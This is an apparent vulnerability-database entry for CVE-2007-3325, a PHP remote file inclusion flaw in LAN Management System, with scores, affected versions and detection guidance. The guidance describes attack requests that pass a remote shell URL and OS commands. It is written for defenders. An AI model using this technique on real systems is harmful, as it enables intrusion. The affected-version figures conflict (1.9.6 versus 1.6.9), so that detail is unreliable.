CVE-2007-3325
published 2007-06-21CVE-2007-3325: PHP remote file inclusion vulnerability in lib/language.php in LAN Management System (LMS) 1.9.6 and earlier allows remote attackers to execute arbitrary PHP…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
64.36%
99.1th percentile
PHP remote file inclusion vulnerability in lib/language.php in LAN Management System (LMS) 1.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _LIB_DIR parameter, a different vector than CVE-2007-1643 and CVE-2007-2205.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lms | lan_management_system | <= 1.6.9 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests targeting lib/language.php with a URL-based value in the _LIB_DIR parameter, indicating remote file inclusion exploitation attempt. ↗
- →Look for GET requests to /lib/language.php containing _LIB_DIR= with an http:// or https:// value in the query string, as the exploit passes a remote shell URL directly in this parameter. ↗
- →The exploit appends a cmd= parameter alongside _LIB_DIR= to pass OS commands to the included remote shell; monitor for both parameters appearing together in requests to language.php. ↗
- ·The vulnerable parameter _LIB_DIR must accept a full URL; ensure PHP's allow_url_include and allow_url_fopen are enabled on the target for exploitation to succeed — hardened configurations may not be exploitable. ↗
- ·This is a different attack vector from CVE-2007-1643 and CVE-2007-2205; detection rules for those CVEs will not cover this specific lib/language.php/_LIB_DIR vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/36194http://www.securityfocus.com/bid/24578https://exchange.xforce.ibmcloud.com/vulnerabilities/34959https://www.exploit-db.com/exploits/4086http://osvdb.org/36194http://www.securityfocus.com/bid/24578https://exchange.xforce.ibmcloud.com/vulnerabilities/34959https://www.exploit-db.com/exploits/4086
2007-06-21
Published